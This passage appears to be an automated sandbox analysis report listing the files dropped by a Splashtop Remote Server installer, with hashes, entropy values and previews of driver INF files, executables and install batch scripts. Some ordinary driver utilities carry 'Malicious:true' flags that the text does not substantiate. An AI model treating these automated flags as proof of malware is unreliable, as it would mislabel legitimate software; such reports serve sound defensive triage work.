                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.776744518403625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dRLPI4FDIIlBILQIIbdRL6V0Lr+FDIItGKhaL3C:kiddRxr2QjdHCxwKcL3C
                                                                                                                                                                                                                                                                                                                                  MD5:4AD78E888894B3F89711D75D526E2D9A
                                                                                                                                                                                                                                                                                                                                  SHA1:A01DD7B5F20052AB27B721127DAB01A34666D4D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:8B82E0E205711B8A22939AB86BF955DB938D2A733F57E48404DD118B5DDB9AE5
                                                                                                                                                                                                                                                                                                                                  SHA-512:CD6C972070593A6FE09778BC043C84CABE61E96FC3EA1B529D993540678AE0E99A641BFFAB87B3AE954977F0C0A9C639185889421225C185615C4EC34A8699F3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd64.exe /u stgamepad.inf >> inst.log..utils\devcon64.exe install stgamepad.inf root\stgamepad >> inst.log..utils\enum64.exe -p 1000 >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8955
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.156854915296666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3F37o7MECwCNnYe+PjPGr9ZCApkT1rrZgjlerpLF+vc1rbrRnJ4aTT:3NEuwCNnYPL/p1P6jeL3JrRiaT
                                                                                                                                                                                                                                                                                                                                  MD5:214E5DB2F6D3FF72B6E4F3BACCD7ECB0
                                                                                                                                                                                                                                                                                                                                  SHA1:64CC6A8F3E79BFA0301924D4A18370CFDD8ED955
                                                                                                                                                                                                                                                                                                                                  SHA-256:C23C1C358705DCE49FD6D1BEB1B0482F74DFCE35FEE7AE4D0C79390385FD22F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:E31E2455A7014937F3E9ECA05D192320CF6159CED333888C6612BE36453F72D76F1015FC1306D41F41CD5F4CB206028ECD99C0F28505D29B6E9E0F497D231D17
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0."...*.H........".0."....1.0...+......0.....+.....7.....{0..w0...+.....7........'PP.M.B.....v..130902014741Z0...+.....7.....0..e0....RA.6.6.8.6.5.4.3.B.1.2.3.6.6.1.8.8.6.3.A.1.F.A.6.3.F.A.2.B.1.4.F.A.8.A.E.5.4.F.A...1..k0>..+.....7...100....F.i.l.e........s.t.g.a.m.e.p.a.d...i.n.f...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+.........heC.#f..:..?..O..T.0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RC.C.2.3.0.0.C.3.E.9.D.5.2.9.0.A.2.A.4.0.6.2.7.3.A.0.F.8.3.5.8.1.D.3.7.F.F.0.1.8...1..s0>..+.....7...100....F.i.l.e........s.t.g.a.m.e.p.a.d...s.y.s...0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1598
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.348428467214068
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:BoJAo10StKRqv8rI3OB/7wBZBZhvC3R7YxGcSF+125dLH/kvGPGo:BoJbkEvReNErZZcQ125CvQR
                                                                                                                                                                                                                                                                                                                                  MD5:5AE5F4B07FABDB969DDA6425E54C4DDD
                                                                                                                                                                                                                                                                                                                                  SHA1:A6686543B1236618863A1FA63FA2B14FA8AE54FA
                                                                                                                                                                                                                                                                                                                                  SHA-256:489CFA94B8FAEA97E0CF73714A65890418247BF34023DC4FDEBB03EF233B12F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C8751CF986E7A2800924D9707FB40AA95F5EE2431E16D5EEDC583FEA1F5351C95BF3FD90AC0EBD81AFC7262FBFA6C452BF1CA1B908E7360515970F146D0D6E50
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$CHICAGO$"..Class=System..ClassGuid={4D36E97D-E325-11CE-BFC1-08002BE10318}..Provider=%splashtop%..DriverVer=05/21/2013,1.0.0.0..CatalogFile=stgamepad.cat....[SourceDisksFiles]..stgamepad.sys = 99....[SourceDisksNames]..99 = %DISK_NAME%,,,""....[SourceDisksNames.AMD64]..99 = %DISK_NAME%,,,\64bits....[DestinationDirs]..DefaultDestDir = 12....[Manufacturer]..%splashtop% = Vendor, NTx86, NTx86.6.1, NTAMD64, NTAMD64.6.1....[Vendor.NTx86]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[Vendor.NTAMD64]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[Vendor.NTx86.6.1]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[Vendor.NTAMD64.6.1]..%splashtop.DeviceDesc% = StGamepad_Install, root\stgamepad....[StGamepad_Install.NT]..CopyFiles = StGamepad_Install.NT.Copy....[StGamepad_Install.NT.hw]..AddReg = StGamepad_Device_AddReg....[StGamepad_Install.NT.Copy]..stgamepad.sys....[StGamepad_Device_AddReg]....[StGamepad_Install.NT.Service

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):33504
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4990196288743425
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Uwyk2eCK3PRiZ1bcvrlEeT0OEM859sKkgTvEakiX5vFmXhBcfoaM8l1l3nzWPDP8:UupCJeT5EgKkgTMa3VFMmAalaPzumy
                                                                                                                                                                                                                                                                                                                                  MD5:4C3233F0B9A5BC7B58B464C9E1E86D52
                                                                                                                                                                                                                                                                                                                                  SHA1:FCCE254ED5DF8DE6D21623A6E53FA2AEEE030365
                                                                                                                                                                                                                                                                                                                                  SHA-256:832328B8DD98D51A9CE29C3953E85AFB036964299B93B9FB929023F15C63AD9A
                                                                                                                                                                                                                                                                                                                                  SHA-512:884A22B0CE16B91B1A04D6B5E99678CC584484FF5BE3D92ADDB27F0E9D58BFF57A9716C843789F9BD59EC79A55EF342DFD2A0EF39C6E7776CD4FC0211EE8DFCF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........i...i...i.......i.....i...h...i.......i.....i.......i.......i.Rich..i.........................PE..L...5.#R.................N..................0.......................................;..........................................<.......P............f.............. 1...............................................0...............................text...(........................... ..h.rdata..V....0......."..............@..H.data...4....@.......*..............@...PAGE.....%...P...&...,.............. ..`INIT....8............R.............. ....rsrc...P............\..............@..B.reloc...............b..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):154
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.715757968072225
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy9kCCWo7EIbd/KiIKTAxsHs2yo7EIl2YILzDoC:/AjsC3IIbdCiI4FDIIlfILQC
                                                                                                                                                                                                                                                                                                                                  MD5:5D33C035F7B22B463DBD01BC0D31C9E9
                                                                                                                                                                                                                                                                                                                                  SHA1:5345461EF02D330178F047FFBD40C5F4B142A416
                                                                                                                                                                                                                                                                                                                                  SHA-256:45C7D88A3D4643220137D23DBE0EB5CE45DFB6AD16EDC1D6EE4CA8FD1C41AF49
                                                                                                                                                                                                                                                                                                                                  SHA-512:88E339E01417D6EFAA8271E6F3A9D077711508A3EE4D0CF3A95E6607C0282D201633113EACB8A142189F54476AD7B501EAEEA5AC2D9297A06B1A7A55D73B8940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\enum.exe -u 0 >> inst.log..utils\devcon.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd.exe /u stgamepad.inf >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.807126999960993
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy9dJFtCWo7EIbdRLX/IKTAxsHs2yo7EIl3xILzDoC:/AjsZW3IIbdRLPI4FDIIlBILQC
                                                                                                                                                                                                                                                                                                                                  MD5:D0E7FCE8A8281FC10CB9548299254079
                                                                                                                                                                                                                                                                                                                                  SHA1:112A4EA65D2CC4A1C57EB6967AC058C8EDE341DE
                                                                                                                                                                                                                                                                                                                                  SHA-256:11F757D09B095A89D52A990149379618551D88E92E1C9BEEFED243A083487260
                                                                                                                                                                                                                                                                                                                                  SHA-512:8132F0DFE0071D3CA3CC5D4CD6ED2634E61314BF6BB84AF5B5F97261E3E26601F1C6AA5C8ABBDA596639CAF4C0E2AFC3A2DE46BB92C199894DD5CFC2DF519CFF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\enum64.exe -u 0 >> inst.log..utils\devcon64.exe /r remove root\stgamepad >> inst.log..utils\DIFxCmd64.exe /u stgamepad.inf >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\enum.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.289815206775557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:Qexcism3zhYFH1u0BFhdzQV3TdfPq12pru6JEkb8oHA1Ib/meUmV:QeKduuf1+DEgprhh82Tirm
                                                                                                                                                                                                                                                                                                                                  MD5:5F1E3F3B071AB0D51AB45060D156AF17
                                                                                                                                                                                                                                                                                                                                  SHA1:2FFCC9CC689C7C3DA18DF015C4BCC880F185C800
                                                                                                                                                                                                                                                                                                                                  SHA-256:B628E895BFC38227DB258DB91959C6D55367877669944DA022A89469101D8BCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:3EAAB54CD58350BADBE0F32B78BA7EA8EA50072AA159A3A36AD730116247D225C164CFCAFFE920C34D9287E55E68D933A92D4F7E7D3CEF9E8E3F185DAB629BC7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.9...W...W...W.......W.......W.......W......W...V.O.W.....].W.?{)...W.......W.......W.Rich..W.........PE..L...5.#R............................p........0....@..........................`......F.....@...... ..........................,%..P....@..8....................P..........................................@............................................text............................... ..`.data........0......................@....rsrc...8....@......."..............@..@.reloc.......P.......(..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\enum64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.886509604340361
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:reQH6MzhfmNHuhv9LIFJxGNIiTwnPXIXBY+CzASxvh1b7sAmIb/IeUmV:rezev9cGNIiTGOY9Dxvh1xUrm
                                                                                                                                                                                                                                                                                                                                  MD5:815848A1B7AA76DE38315A7C796165DE
                                                                                                                                                                                                                                                                                                                                  SHA1:131016320240F5760853BB0AE8ED34CE8865C4B5
                                                                                                                                                                                                                                                                                                                                  SHA-256:99FF169E6114BA53DDC6BFCDB08CF73CB1104E69EEDC2A13F39605A96CAA5367
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A9453528FC5335AFF02717EE7271EBE253CF986FE71B7CE4BE4B060BE7EF625EA33877F98B2DEA54432A2F7625314A5B3DCF57518209E818EC03589257E69F6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Kf................U.......C.0.....D.......S.....y...........n...y.........I.....(.........T.......Q.....Rich............PE..d...7.#R..........".................H.........@..............................p......|.....@.......... ......................................`$..P....P..8....@...............`..........................................................X............................text............................... ..`.data........0......................@....pdata.......@.......$..............@..@.rsrc...8....P.......&..............@..@.reloc..h....`.......,..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.221234341229966
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:VrY6t5UbhKRvV2ktXrTsIeZvEMtXrGrJKhrlXgpAY1u5lSuWJmiDUNLk32pNaf1E:5Y6qhKT2mvsIeZvEuarJKhpXo1moJmiI
                                                                                                                                                                                                                                                                                                                                  MD5:BECB66962164A387453E351769E665A4
                                                                                                                                                                                                                                                                                                                                  SHA1:D5651F9CE02E1D48E85A33DCAFB906F3DC575365
                                                                                                                                                                                                                                                                                                                                  SHA-256:294AE63315DCFCBA4F8BB30BC4098E6BF39281244BC215FE9EB8EA3B778CEC48
                                                                                                                                                                                                                                                                                                                                  SHA-512:03523212E1827635EB2573ABE2B1A3D66BA529990917B739AF6B2C6727223D2E99E4A353B21F2871FFBCA44D22623409EA1451CF0A0ADBED9C0E8DBB6E55C6CF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x86\my_setup.dll....REM..REM If OSBase/KairOS driver is previously installed, stop the installation...REM..sc query ddmgr..IF %ERRORLEVEL% EQU 0 (.. echo OSBase iDisplay driver detected! Try uninstall OSbase/KairOS iDisplay software... goto exit..)....REM..REM If older driver (lci_proxykmd) is previously installed, stop the installation...REM..sc query lci_proxykmd..IF %ERRORLEVEL% EQU 0 (.. echo Older display driver detected! Uninstall it first.. %DEVCMD% do_uninstall_lci_proxykmd .. timeout /t 1 /nobreak.. sc.exe delete lci_proxykmd....:wait_for_delete.. sc query lci_proxykmd.. if %ERRORLEVEL% EQU 0 (.. timeout /t 1 /nobreak.. goto wait_for_delete.. )..... timeout /t 1 /nobreak.... del %

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1414
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.220204645552163
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:VrY6t5UbhKdvV2ktXrTsIeZvEMtXrGrJKhrlXgpAY1u5lSuWJmiDUNLkQ2pNaf1E:5Y6qhK32mvsIeZvEuarJKhpXo1moJmiX
                                                                                                                                                                                                                                                                                                                                  MD5:B80450985E33B188398EF5475FE3A4BA
                                                                                                                                                                                                                                                                                                                                  SHA1:6699FE7C174A9A585E3559A16877B5555687F6F0
                                                                                                                                                                                                                                                                                                                                  SHA-256:760BC44295820C5AF7E2D5077CE05EED8E23B3EF344D5C6C48422818DDE78D41
                                                                                                                                                                                                                                                                                                                                  SHA-512:BA29A71114A86E10ACE80F5B039DB68F4FE3BFD5592ECC6511D9AA0235E75ACFA188909EE0453593EBEFDB33DB46D1272C98A44350ABB24810C52FDEE817853F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x64\my_setup.dll....REM..REM If OSBase/KairOS driver is previously installed, stop the installation...REM..sc query ddmgr..IF %ERRORLEVEL% EQU 0 (.. echo OSBase iDisplay driver detected! Try uninstall OSbase/KairOS iDisplay software... goto exit..)....REM..REM If older driver (lci_proxykmd) is previously installed, stop the installation...REM..sc query lci_proxykmd..IF %ERRORLEVEL% EQU 0 (.. echo Older display driver detected! Uninstall it first.. %DEVCMD% do_uninstall_lci_proxykmd .. timeout /t 1 /nobreak.. sc.exe delete lci_proxykmd....:wait_for_delete.. sc query lci_proxykmd.. if %ERRORLEVEL% EQU 0 (.. timeout /t 1 /nobreak.. goto wait_for_delete.. )..... timeout /t 1 /nobreak.... del %

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\uninstall_driver.bat

